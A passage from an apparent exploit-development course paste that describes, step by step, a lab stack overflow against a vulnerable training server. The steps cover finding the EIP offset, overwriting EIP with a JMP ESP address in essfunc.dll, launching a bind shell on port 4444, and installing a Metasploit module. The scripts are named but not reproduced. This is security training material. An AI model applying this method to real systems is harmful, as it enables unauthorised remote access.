  3243. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  3244.  
  3245. 5-2006char-eip-check.py
  3246. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  3247.  
  3248. 6-jmp-esp.py
  3249. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  3250.  
  3251. 7-first-exploit
  3252. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  3253.  
  3254. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  3255.  
  3256.  
  3257. ------------------------------
  3258.  
  3259. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  3260.  
  3261. vi vulnserv.rb (paste the code into this file)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement